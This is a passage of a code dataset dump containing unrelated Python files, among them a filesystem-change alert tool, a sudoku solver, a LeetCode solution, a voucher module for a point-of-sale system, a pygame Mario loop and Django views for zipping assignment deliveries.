symbols[str(3)] = str(block.get_symbol_4())\n\n\n result['symbols'] = symbols\n\n app.logger.info(result)\n return jsonify(result), 200 \n\n ","sub_path":"routes/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4995880","text":"import os\nimport urwid\nimport time\nimport magic\n\ntheList = {}\nfor root, dirs, files in os.walk(\"/\", topdown=True): #intial indexing of everything except /proc (funky directory)\n if \"proc\" in dirs:\n dirs.remove(\"proc\")\n if \"run\" in dirs:\n dirs.remove(\"run\")\n if \"mnt\" in dirs:\n dirs.remove(\"mnt\")\n if \"lib\" in dirs:\n dirs.remove(\"lib\")\n for name in files:\n x = os.path.join(root, name)\n if theList.__contains__(x) == False:\n theList[x] = 1\n else:\n theList[x] += 1\n\ndef signal_alert():\n# Signals used for alerts\n signal = False\n message = 'ALERT!'\n theCheckList = {}\n for root, dirs, files in os.walk(\"/\", topdown=True): #comparison indexing\n if \"proc\" in dirs:\n dirs.remove(\"proc\")\n if \"run\" in dirs:\n dirs.remove(\"run\")\n if \"mnt\" in dirs:\n dirs.remove(\"mnt\")\n if \"lib\" in dirs:\n dirs.remove(\"lib\")\n for name in files:\n x = os.path.join(root, name)\n if theCheckList.__contains__(x) == False:\n theCheckList[x] = 1\n else:\n theCheckList[x] += 1 \n if theCheckList != theList:\n differenceDict = dict(set(theCheckList.items()) - set(theList.items())) #remove all original array items from array from new check to see whats up\n for key in differenceDict:\n try:\n if \"ELF\" in magic.from_file(key) or \"PHP\" in magic.from_file(key) or \"script\" in magic.from_file(key): #are any of the new items elfs\n signal = True\n message += '\\n' + key + ' exists'\n except:\n continue\n if signal:\n return(True, message)\n return (False, 'nothing detected')\n\nclass Alert:\n def __init__(self):\n self.loop = None\n self.animate_alarm = None\n self.placeholder = urwid.SolidFill()\n self.palette = []\n self.started = False\n\n def update_screen(self):\n result = signal_alert()\n if result[0]:\n self.alert_screen(result[1])\n else:\n self.calm_screen(result[1])\n self.loop.screen.clear()\n \n def handle_input(self, key):\n if key in ('q', 'Q'):\n raise urwid.ExitMainLoop()\n else:\n if not self.started:\n self.started = True\n self.update()\n\n def alert_screen(self, message):\n self.palette = [\n ('banner', '', '', '', '#ffa', '#60d'),\n ('streak', '', '', '', 'g50', '#60a'),\n ('inside', '', '', '', 'g38', '#808'),\n ('outside', '', '', '', 'g27', '#a06'),\n ('bg', '', '', '', 'g7', '#d06'),]\n self.txt.set_text(('banner', message))\n if self.loop:\n self.loop.screen.register_palette(self.palette)\n self.loop.widget = urwid.AttrMap(self.placeholder, 'bg')\n self.loop.widget.original_widget = urwid.Filler(urwid.Pile([]))\n div = urwid.Divider()\n outside = urwid.AttrMap(div, 'outside')\n inside = urwid.AttrMap(div, 'inside')\n streak = urwid.AttrMap(self.txt, 'streak')\n pile = self.loop.widget.base_widget # .base_widget skips the decorations\n for item in [outside, inside, streak, inside, outside]:\n pile.contents.append((item, pile.options()))\n\n def calm_screen(self, message):\n self.palette = [\n ('banner', '', '', '', '#ffa', '#066'),\n ('streak', '', '', '', '#066', '#066'),\n ('inside', '', '', '', '#076', '#076'),\n ('outside', '', '', '', '#0a5', '#0a5'),\n ('bg', '', '', '', '#0c5', '#0c5'),]\n self.txt.set_text(('banner', message))\n if self.loop:\n self.loop.screen.register_palette(self.palette)\n self.loop.widget = urwid.AttrMap(self.placeholder, 'bg')\n self.loop.widget.original_widget = urwid.Filler(urwid.Pile([]))\n div = urwid.Divider()\n outside = urwid.AttrMap(div, 'outside')\n inside = urwid.AttrMap(div, 'inside')\n streak = urwid.AttrMap(self.txt, 'streak')\n pile = self.loop.widget.base_widget # .base_widget skips the decorations\n for item in [outside, inside, streak, inside, outside]:\n pile.contents.append((item, pile.options()))\n\n def draw(self):\n # The main method for starting the Alarm. \n self.txt = urwid.Text(('banner', u'Press any button...'), align='center')\n self.loop = urwid.MainLoop(self.placeholder, self.palette, unhandled_input=self.handle_input)\n \n self.loop.screen.set_terminal_properties(colors=256)\n self.loop.widget = urwid.AttrMap(self.placeholder, 'bg')\n self.loop.widget.original_widget = urwid.Filler(urwid.Pile([]))\n div = urwid.Divider()\n outside = urwid.AttrMap(div, 'outside')\n inside = urwid.AttrMap(div, 'inside')\n streak = urwid.AttrMap(self.txt, 'streak')\n pile = self.loop.widget.base_widget # .base_widget skips the decorations\n pile.contents.clear()\n for item in [outside, inside, streak, inside, outside]:\n pile.contents.append((item, pile.options()))\n self.loop.run()\n\n def update(self, loop=None, user_data=None):\n self.update_screen()\n self.animate_alarm = self.loop.set_alarm_in(0.1, self.update)\n\ndef main():\n Alert().draw()\n\nif '__main__'==__name__:\n main()\n \n","sub_path":"term-alert.py","file_name":"term-alert.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"4761011","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @Time:2020/8/30 14:07\n# @Author:JiahangGu\nfrom typing import List\n\n\nclass Solution(object):\n def getMaxLen(self, nums):\n \"\"\"\n 首先以0为边界划分为若干段连续非0子数组,找出所有子数组中最大长度即可。子数组长度由负数个数决定,如果负数为偶数个,\n 则长度为整个数组长度,如果为奇数,则长度为去除最后一个负数后的子数组和去除第一个负数前的子数组的更大的长度\n :type nums: List[int]\n :rtype: int\n \"\"\"\n def cal_max_length(neg, s, e):\n if s > e:\n return 0\n if len(neg) & 1 == 1:\n if len(neg) == 1:\n return max(neg[0] - s, e - neg[0])\n else:\n return max(neg[-1] - s, e - neg[0])\n else:\n return e - s + 1\n\n start = 0\n negs = []\n ans = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n ans = max(ans, cal_max_length(negs, start, i-1))\n start = i+1\n negs = []\n continue\n if nums[i] < 0:\n negs.append(i)\n ans = max(ans, cal_max_length(negs, start, len(nums)-1))\n return ans\n\n\ns = Solution()\nprint(s.getMaxLen([1,2,3]))\n","sub_path":"All Problems/5500-maximum-length-of-subarray-with-positive-product.py","file_name":"5500-maximum-length-of-subarray-with-positive-product.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594018847","text":"from utils import *\r\n\r\ndef grid_values(grid):\r\n \"\"\"Convert grid string into {: } dict with '.' value for empties.\r\n Args:\r\n grid: Sudoku grid in string form, 81 characters long\r\n Returns:\r\n Sudoku grid in dictionary form:\r\n - keys: Box labels, e.g. 'A1'\r\n - values: Value in corresponding box, e.g. '8', or '.' if it is empty.\r\n \"\"\"\r\n lines=[]\r\n r={}\r\n for x in range(0,9):\r\n y= x*9\r\n lines.append(grid[y:y+9])\r\n for z in range(0,9):\r\n if lines[x][z] != \".\":\r\n r[row_units[x][z]]=lines[x][z] \r\n else:\r\n r[row_units[x][z]]=\"123456789\"\r\n \r\n return r\r\n\r\ndef get_peers(k):\r\n allpeers=[];\r\n for r in row_units:\r\n if k in r:\r\n allpeers=allpeers+r\r\n break\r\n for c in column_units:\r\n if k in c:\r\n allpeers=allpeers+c\r\n break\r\n\r\n for sq in square_units:\r\n if k in sq:\r\n allpeers=allpeers+sq\r\n break\r\n \r\n #removing duplicates \r\n allpeers=sorted(list(set(allpeers)))\r\n \r\n return allpeers\r\n\r\ndef eliminate(values):\r\n \"\"\"Eliminate values from peers of each box with a single value.\r\n Go through all the boxes, and whenever there is a box with a single value,\r\n eliminate this value from the set of values of all its peers.\r\n Args:\r\n values: Sudoku in dictionary form.\r\n Returns:\r\n Resulting Sudoku in dictionary form after eliminating values.\r\n \"\"\"\r\n pass\r\n units=[]\r\n clean=[]\r\n clean=values\r\n #checking all values in grid\r\n for k,v in values.items():\r\n #checking if it is a unknown value\r\n if len(v)>1:\r\n\r\n #getting all peers\r\n allpeers=get_peers(k)\r\n \r\n #getting off all the numbers \r\n for p in allpeers:\r\n if len(values[p])==1 and values[p] in v and k!=p:\r\n clean[k]=clean[k].replace(values[p],\"\")\r\n allpeers.clear()\r\n return values\r\nfrom utils import *\r\n\r\n\r\ndef only_choice(values):\r\n \"\"\"Finalize all values that are the only choice for a unit.\r\n Go through all the units, and whenever there is a unit with a value\r\n that only fits in one box, assign the value to this box.\r\n Input: Sudoku in dictionary form.\r\n Output: Resulting Sudoku in dictionary form after filling in only choices.\r\n \"\"\"\r\n # TODO: Implement only choice strategy here\r\n \r\n for sq in square_units:\r\n for box in sq:\r\n if(len(values[box])>1):\r\n for digit in values[box]:\r\n unique=True\r\n for parser in sq:\r\n if(parser==box):\r\n continue\r\n if (digit in values[parser]):\r\n unique=False\r\n continue\r\n if unique:\r\n values[box]=digit\r\n \r\n return values\r\n\r\n\r\ndef reduce_puzzle(values):\r\n stalled = False\r\n while not stalled:\r\n # Check how many boxes have a determined value\r\n solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])\r\n\r\n # Your code here: Use the Eliminate Strategy\r\n values=eliminate(values)\r\n # Your code here: Use the Only Choice Strategy\r\n values=only_choice(values)\r\n # Check how many boxes have a determined value, to compare\r\n solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])\r\n # If no new values were added, stop the loop.\r\n stalled = solved_values_before == solved_values_after\r\n # Sanity check, return False if there is a box with zero available values:\r\n if len([box for box in values.keys() if len(values[box]) == 0]):\r\n return False\r\n return values\r\n\r\ndef search(values):\r\n \"Using depth-first search and propagation, create a search tree and solve the sudoku.\"\r\n # First, reduce the puzzle using the previous function\r\n \r\n # Choose one of the unfilled squares with the fewest possibilities\r\n \r\n # Now use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer!\r\n\r\n # If you're stuck, see the solution.py tab!\r\n \r\n solved=True\r\n values=reduce_puzzle(values)\r\n \r\n #problem with function \r\n if values==False:\r\n return False\r\n #checking if there is number greater than 9\r\n for v in values.values():\r\n if len(v)>1:\r\n solved=False\r\n break\r\n\r\n if solved:\r\n \r\n return values\r\n #picking the smallest numeber with more than 2 digits\r\n\r\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\r\n\r\n\r\n for digit in values[s]:\r\n new_solution=values.copy()\r\n new_solution[s]=digit\r\n result=search(new_solution)\r\n if result:\r\n\r\n return result\r\n return False\r\ndef generate_test_case(testcase):\r\n test=grid_values(testcase)\r\n test[\"E5\"]=\"23\"\r\n test[\"E1\"]=\"23\"\r\n test[\"B5\"]=\"23\"\r\n test[\"I5\"]=\"1345\"\r\n test[\"E9\"]=\"1245\"\r\n return test\r\n\r\ndef naked_twins(values):\r\n \r\n for k,v in values.items():\r\n if len(v)==2:\r\n #removving from row\r\n for r in row_units:\r\n if k in r:\r\n for b in r:\r\n if values[b]==v and k!=b:\r\n for digit in v:\r\n for aux in r:\r\n if(aux!=b and aux!=k):\r\n values[aux]=values[aux].replace(digit,\"\")\r\n #removing from column \r\n for c in column_units:\r\n if k in c:\r\n for b in c:\r\n if values[b]==v and k!=b:\r\n for digit in v:\r\n for aux in c:\r\n if(aux!=b and aux!=k):\r\n values[aux]=values[aux].replace(digit,\"\") \r\n \r\n \r\n return values\r\nsudoku='4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'\r\ntestcase='.................................................................................'\r\ntest=generate_test_case(testcase)\r\ndisplay(naked_twins(test))\r\n\r\n\r\n","sub_path":"Sudoku/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139929446","text":"class EpisodeFilter:\n\n def __init__(self):\n self.filter_complete_laps = False\n self.filter_from_start_line = False\n self.filter_max_steps = 0\n self.filter_min_percent = 0\n self.filter_complete_section = None\n self.filter_min_average_reward = 0\n self.filter_peak_track_speed = 0\n self.filter_specific_waypoint_id = -1\n self.filter_specific_waypoint_min_reward = 0\n\n self.all_episodes = None\n\n def reset(self):\n self.filter_complete_laps = False\n self.filter_from_start_line = False\n self.filter_max_steps = 0\n self.filter_min_percent = 0\n self.filter_complete_section = None\n self.filter_min_average_reward = 0\n self.filter_peak_track_speed = 0\n self.filter_specific_waypoint_id = -1\n self.filter_specific_waypoint_min_reward = 0\n\n def set_filter_complete_laps(self, setting :bool):\n self.filter_complete_laps = setting\n\n def set_filter_from_start_line(self, setting :bool):\n self.filter_from_start_line = setting\n\n def set_filter_max_steps(self, setting: int):\n self.filter_max_steps = setting\n\n def set_filter_min_percent(self, percent: int):\n self.filter_min_percent = percent\n\n def set_filter_min_average_reward(self, min_reward: int):\n self.filter_min_average_reward = min_reward\n\n def set_filter_complete_section(self, waypoint_id_1, waypoint_id_2):\n self.filter_complete_section = (waypoint_id_1, waypoint_id_2)\n\n def set_filter_peak_track_speed(self, peak_track_speed):\n self.filter_peak_track_speed = peak_track_speed\n\n def set_filter_specific_waypoint_reward(self, waypoint_id :int, min_reward :float):\n self.filter_specific_waypoint_id = waypoint_id\n self.filter_specific_waypoint_min_reward = min_reward\n\n def set_all_episodes(self, all_episodes):\n self.all_episodes = all_episodes\n\n def get_filtered_episodes(self):\n if not self.all_episodes:\n return None\n\n result = []\n for e in self.all_episodes:\n if e.lap_complete or not self.filter_complete_laps:\n if e.is_real_start or not self.filter_from_start_line:\n if e.step_count <= self.filter_max_steps or self.filter_max_steps == 0:\n if e.percent_complete >= self.filter_min_percent:\n if e.average_reward >= self.filter_min_average_reward:\n if e.peak_track_speed >= self.filter_peak_track_speed:\n if self.matches_complete_section_filter(e):\n if self.matches_specific_waypoint_reward_filter(e):\n result.append(e)\n\n return result\n\n def matches_specific_waypoint_reward_filter(self, episode):\n if self.filter_specific_waypoint_id < 0 or self.filter_specific_waypoint_min_reward == 0:\n return True\n else:\n for e in episode.events:\n if e.closest_waypoint_index == self.filter_specific_waypoint_id and e.reward >= self.filter_specific_waypoint_min_reward:\n return True\n\n return False\n\n def matches_complete_section_filter(self, episode):\n if self.filter_complete_section == None:\n return True\n\n (start, finish) = self.filter_complete_section\n\n actual_start = episode.events[0].closest_waypoint_index\n actual_finish = episode.events[-1].closest_waypoint_index\n\n # This logic is only for finish >= start # the opposite is TODO (i.e. crosing start line)\n assert(finish >= start)\n\n if actual_start <= start and actual_finish >= finish:\n return True\n\n if actual_finish >= finish and actual_start > actual_finish:\n return True\n\n if actual_start > actual_finish and actual_start <= start:\n return True\n\n return False","sub_path":"src/episode/episode_filter.py","file_name":"episode_filter.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337589855","text":"#!/usr/bin/env pypy\n# -*- coding: utf-8 -*-\n# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:\n\nimport urllib2\nfrom os.path import basename\nfrom urlparse import urlsplit\n\ndef url2name(url):\n return basename(urlsplit(url)[2])\n\ndef download(url, localFileName = None):\n localName = url2name(url)\n import pdb;pdb.set_trace()\n req = urllib2.Request(url)\n r = urllib2.urlopen(req)\n if r.info().has_key('Content-Disposition'):\n # If the response has Content-Disposition, we take file name from it\n localName = r.info()['Content-Disposition'].split('filename=')[1]\n if localName[0] == '\"' or localName[0] == \"'\":\n localName = localName[1:-1]\n elif r.url != url:\n # if we were redirected, the real file name we take from the final URL\n localName = url2name(r.url)\n if localFileName:\n # we can force to save the file as specified name\n localName = localFileName\n f = open(localName, 'wb')\n f.write(r.read())\n f.close()\n\n\ndownload('http://lifehacker.com/how-clutter-affects-your-brain-and-what-you-can-do-abo-662647035')\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635737287","text":"from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bearing', '0004_auto_20160915_1202'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='bearing',\n name='design',\n field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='bearing_design', to='bearing.BearingDesign', verbose_name='Bearing design'),\n ),\n migrations.AlterField(\n model_name='bearing',\n name='type',\n field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='bearing_list', to='bearing.BearingType', verbose_name='Bearing type'),\n ),\n migrations.AlterField(\n model_name='bearingdesign',\n name='type',\n field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_DEFAULT, to='bearing.BearingType', verbose_name='Type'),\n ),\n ]\n","sub_path":"app/bearing/migrations/0005_auto_20160921_1354.py","file_name":"0005_auto_20160921_1354.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649639422","text":"\"\"\"\nComo saber se um número é feliz ou triste?\n1- Dado um número inteiro positivo\n2- Substitua o número pela soma dos quadrados dos seus dígitos.\n3- Se o resultado for 1, o número é feliz\n4- Caso contrário, repita o processo indefinidamente.\n\n\"\"\"\n\ndef happy(number):\n next_ = sum(int(char) ** 2 for char in str(number))\n return number in (1, 7) if number < 10 else happy(next_)\n\nassert all([happy(n) for n in (1, 10, 100, 130, 97)]) \nassert not all(happy(n) for n in (2,3,4,5,6,8,9))","sub_path":"dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443710935","text":"# -*- coding: utf-8 -*-\nimport math\nimport string\nfrom tools.translate import _\nfrom datetime import datetime\nfrom osv import fields,osv\n\nclass wf_pos_order_voucher(osv.osv):\n _inherit = \"pos.order\"\n \n def check_voucher(self, cr, uid, ids, context=None):\n today = datetime.now().strftime(\"%Y-%m-%d\")\n for o in self.browse(cr, uid, ids):\n line_obj = self.pool.get('pos.order.line')\n voucher_obj = self.pool.get('wf_voucher.voucher')\n for line in o.lines:\n ref = o.name\n\n if line.wf_voucher_id and (not line.wf_voucher_id.wf_gueltig_bis or line.wf_voucher_id.wf_gueltig_bis >= today):\n if line.wf_voucher_id.wf_type == 'disc':\n voucher_obj.write(cr, uid, [line.wf_voucher_id.id], {'wf_einloes': [o.date_confirm],'wf_rest': 0, 'wf_order_einloes': ref, 'wf_counter': line.wf_voucher_id.wf_counter+1})\n elif line.wf_voucher_id.wf_type == 'ser' or line.wf_voucher_id.wf_type == 'disc_ser':\n voucher_obj.write(cr, uid, [line.wf_voucher_id.id], {'wf_einloes': [o.date_confirm], 'wf_order_einloes': ref, 'wf_counter': line.wf_voucher_id.wf_counter+1})\n else:\n\n if o.amount_total > 0: \n order_wert = (line.price_unit)*(-1)\n else:\n order_wert = (line.price_unit)*(-1) + o.amount_total\n self.write(cr, uid, ids, {'amount_total': 0, 'amount_tax': 0})\n line_obj.write(cr, uid, [line.id], {'price_unit': (order_wert*(-1))})\n\n\n rest_wert = line.wf_voucher_id.wf_rest\n \n if (line.wf_voucher_id.wf_rest >= order_wert):\n rest_wert = rest_wert - order_wert\n voucher_obj.write(cr, uid, [line.wf_voucher_id.id], {'wf_rest': rest_wert, 'wf_einloes': [o.date_order], 'wf_order_einloes': ref})\n \n else: \n rest_wert = rest_wert*(-1)\n line_obj.write(cr, uid, [line.id], {'price_unit': rest_wert})\n voucher_obj.write(cr, uid, [line.wf_voucher_id.id], {'wf_rest': '0', 'wf_einloes': [o.date_order], 'wf_order_einloes': ref})\n raise osv.except_osv('Warnung','the voucher had only: %s Euro' %(rest_wert))\n\n elif \"888888\" in line.product_id.default_code and line.price_unit > 0:\n\n anzahl = line.qty\n nummer = \"\"\n while anzahl > 0:\n voucher = self.pool.get('ir.sequence').get(cr, uid, 'wf_voucher.voucher')\n voucher = int(voucher)\n z7 = voucher%10\n zahl = voucher//10\n z6 = zahl%10\n zahl = zahl//10\n z5 = zahl%10\n zahl = zahl//10\n z4 = zahl%10\n zahl = zahl//10\n z3 = zahl%10\n zahl = zahl//10\n z2 = zahl%10\n zahl = zahl//10\n z1 = zahl%10\n e1 = (z1*3)+(z2*1)+(z3*3)+(z4*1)+(z5*3)+(z6*1)+(z7*3)\n e2 = (e1//10)+1\n z8 = (e2*10)-e1\n if ( z8 == 10):\n voucher_nr = (voucher*10)\n else:\n voucher_nr = (voucher*10)+z8 \n wf_wert = line.price_unit\n wf_waehrung = o.pricelist_id.currency_id.id\n nummer += \"%i \" % (voucher_nr)\n line_obj.write(cr, uid, [line.id], {'notice': nummer})\n voucher_obj.create(cr, uid, {\n 'wf_wert': wf_wert,\n 'wf_rest': wf_wert,\n 'wf_waehrung': wf_waehrung,\n 'wf_order_ref': ref,\n 'wf_product_voucher_id': line.product_id.id,\n 'name': voucher_nr,\n }, context=context)\n anzahl = anzahl -1\n elif \"888888\" in line.product_id.default_code and line.price_unit <= 0:\n raise osv.except_osv('Warnung',_('The voucher must have a positive Value. To redeem a voucher, please use button reedem voucher'))\n elif \"888887\" in line.product_id.default_code and line.price_unit <= 0:\n raise osv.except_osv('Warnung',_('The deposit must be positive'))\n return True\n\nwf_pos_order_voucher()","sub_path":"wf_voucher/wizard/wf_pos_order_voucher.py","file_name":"wf_pos_order_voucher.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447258311","text":"import pygame, sys\nimport time\nfrom classes.Mario import Mario\n\npygame.init()\nFPS = 1\nfpsClock = pygame.time.Clock()\n\nwindowSize = (640, 480)\n\n# mario = pygame.image.load('./mario.png')\n# mario = mario.subsurface((80, 34, 16, 16))\n# mario = pygame.transform.scale(mario, (32, 32))\n# DISPLAYSURF.blit(self.img, (int(self.x), int(self.y)))\n\ndisplaySurface = pygame.display.set_mode(windowSize)\nmario = Mario(0,0,\"sound\",displaySurface)\npygame.display.set_caption('MARIO')\npygame.init()\ni = 0\nwhile True:\n left = False\n right = False\n up = False\n down = True\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n left = True\n if event.key == pygame.K_RIGHT:\n right = True\n if event.key == pygame.K_UP:\n up = True\n down = True\n if event.key == pygame.K_DOWN:\n down = True\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n left = False\n if event.key == pygame.K_RIGHT:\n right = False\n if event.key == pygame.K_UP:\n up = False\n if event.key == pygame.K_DOWN:\n down = True\n pygame.display.update()\n mario.updateImage(up,down,right,left,displaySurface)\n # fpsClock.tick(FPS)\n fpsClock.tick(1)\n print(time.time())","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"310361658","text":"from django.views.generic import TemplateView, View\nfrom django.shortcuts import render\nfrom tempfile import TemporaryFile, NamedTemporaryFile\nfrom devilry.apps.gradeeditors.restful import examiner as gradeeditors_restful\nfrom devilry.utils.module import dump_all_into_dict\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, get_list_or_404\nfrom ..core.models import (Assignment)\nfrom devilry.utils.filewrapperwithexplicitclose import FileWrapperWithExplicitClose\nimport zipfile\nimport tarfile\nimport os, glob\nimport shutil\nimport restful\n\n\nclass MainView(TemplateView):\n template_name='examiner/main.django.html'\n\n def get_context_data(self):\n context = super(MainView, self).get_context_data()\n context['restfulapi'] = dump_all_into_dict(restful);\n return context\n\n\nclass AssignmentGroupView(View):\n def get(self, request, assignmentgroupid):\n context = {'objectid': assignmentgroupid,\n 'restfulapi': dump_all_into_dict(restful),\n 'gradeeditors': dump_all_into_dict(gradeeditors_restful)\n }\n return render(request,\n 'examiner/assignmentgroupview.django.html',\n context)\n\nclass AssignmentView(View):\n def get(self, request, assignmentid):\n context = {'assignmentid': assignmentid,\n 'restfulapi': dump_all_into_dict(restful),\n 'gradeeditors': dump_all_into_dict(gradeeditors_restful)\n }\n return render(request,\n 'examiner/assignment.django.html',\n context) \n\n \nclass CompressedFileDownloadView(View):\n\n def _get_candidates_as_string(self, candidates, assignmentgroup_id):\n candidates_as_string = \"\"\n size = len(candidates)-1\n for candidate in candidates:\n candidates_as_string += str(candidate)\n if candidate == candidates[size]:\n candidates_as_string += \"_\"\n else:\n candidates_as_string += \"-\"\n candidates_as_string += \"group-\" + str(assignmentgroup_id)\n return candidates_as_string\n\n def get(self, request, assignmentid):\n assignment = get_object_or_404(Assignment, id=assignmentid)\n\n zip_file_name = assignment.short_name + \".zip\"\n tempfile = NamedTemporaryFile()\n zip_file = zipfile.ZipFile(tempfile, 'w');\n\n basedir = \"deliveries\" + os.sep\n path = basedir\n \n for assignmentgroup in assignment.assignmentgroups.all():\n candidates = self._get_candidates_as_string(assignmentgroup.candidates.all(), assignmentgroup.id)\n\n for deadline in assignmentgroup.deadlines.all():\n deadline_dir_name = deadline.deadline.strftime(\"%d-%m-%Y_\")\n deadline_dir_name += \"group-\" + str(assignmentgroup.id)\n path += deadline_dir_name + os.sep\n path += candidates + os.sep\n deadline_root = path\n\n for delivery in deadline.deliveries.all():\n path += str(delivery.number) + os.sep\n delivery_root = path\n\n for filemeta in delivery.filemetas.all():\n path += filemeta.filename\n file_content = filemeta.deliverystore.read_open(filemeta)\n zip_file.writestr(path, file_content.read())\n path = delivery_root\n path = deadline_root\n path = basedir\n zip_file.close()\n\n tempfile.seek(0)\n response = HttpResponse(FileWrapperWithExplicitClose(tempfile),\n content_type=\"application/zip\")\n response['Content-Disposition'] = \"attachment; filename=%s\" % \\\n zip_file_name.encode(\"ascii\", 'replace')\n response['Content-Length'] = os.stat(tempfile.name).st_size\n return response\n","sub_path":"devilry/apps/examiner/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166615911","text":"import requests as req\n\n\ns = 100\ncount = 100\nfor i in xrange(100, s + count):\n try:\n con = req.get(\"http://www.96225.com/smknet/codeImageServlet\").content\n with file(\"img/%s.jpg\" % i, 'wb')as f:\n f.write(con)\n except:\n raise\n","sub_path":"code/new_img.py","file_name":"new_img.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"421249122","text":"def print_table(table):\n columns_quantity = len(table)\n rows_quantity = len(table[0])\n column_widths = [len(max(column, key=len)) for column in table]\n for row in range(rows_quantity):\n for column in range(columns_quantity):\n print(table[column][row].rjust(column_widths[column]), end=' ')\n print()\n\n\ntable_data = [['apples', 'oranges', 'cherries', 'banana'],\n ['Alice', 'Bob', 'Carol', 'David'],\n ['dogs', 'cats', 'thisWordIsVeryLongForTestingPurposes', 'goose']]\n\n\nprint_table(table_data)\n","sub_path":"students/uss_tomasz/lesson_07_manipulating_strings_and_datetime_formatting/7_1/table_printer.py","file_name":"table_printer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163158893","text":"#作业背景:在数据处理的步骤中,可以使用 SQL 语句或者 pandas 加 Python 库、函数等方式进行数据的清洗和处理工作。\r\n#因此需要你能够掌握基本的 SQL 语句和 pandas 等价的语句,利用 Python 的函数高效地做聚合等操作。\r\n#作业要求:请将以下的 SQL 语句翻译成 pandas 语句:\r\n\r\nimport pandas as pd \r\nimport numpy as np\r\n\r\ndata = pd.DataFrame({\r\n 'id':np.arange(1,21),\r\n 'age':np.random.randint(25,100,20)\r\n})\r\n\r\ntable1 = pd.DataFrame({\r\n 'id':np.arange(1,11),\r\n 'age':np.random.randint(20,100,10)\r\n})\r\n\r\ntable2 = pd.DataFrame({\r\n 'id':np.arange(1,11),\r\n 'age':np.random.randint(20,100,10)\r\n})\r\n\r\n\r\n#1. SELECT * FROM data;\r\nprint(data)\r\n\r\n#2. SELECT * FROM data LIMIT 10;\r\nprint(data[:11])\r\n\r\n#3. SELECT id FROM data; //id 是 data 表的特定一列\r\nprint(data['id'])\r\n\r\n#4. SELECT COUNT(id) FROM data;\r\nprint(data.id.shape[0])\r\n\r\n#5. SELECT * FROM data WHERE id<1000 AND age>30;\r\nprint(data[(data['id']<1000) & (data['age']>30)])\r\n\r\n#6. SELECT id,COUNT(DISTINCT order_id) FROM table1 GROUP BY id;\r\n\r\n\r\n#7. SELECT * FROM table1 t1 INNER JOIN table2 t2 ON t1.id = t2.id;\r\nprint(pd.merge(table1, table2, on='id'))\r\n\r\n#8. SELECT * FROM table1 UNION SELECT * FROM table2;\r\nprint(pd.concat([table1,table2]).reset_index(drop=True))\r\n\r\n#9. DELETE FROM table1 WHERE id=10;\r\ntable1.drop(table1[table1['id'] == 10].index[0])\r\n\r\n#10. ALTER TABLE table1 DROP COLUMN column_name;\r\ntable1.drop(columns=['age'] , axis=1)","sub_path":"week04/Assigment_week04.py","file_name":"Assigment_week04.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"429399554","text":"from django.shortcuts import render\nfrom django.shortcuts import render,redirect\nfrom django.template.context_processors import csrf\nfrom django.conf import settings\nfrom .forms import uploadform\nfrom .models import upload\nfrom django.views.decorators.http import require_POST\nimport sys,os\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.cache import cache\nimport json\nfrom django.http.response import JsonResponse\nfrom django.template.loader import render_to_string\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login,authenticate\nfrom django.contrib.auth.forms import 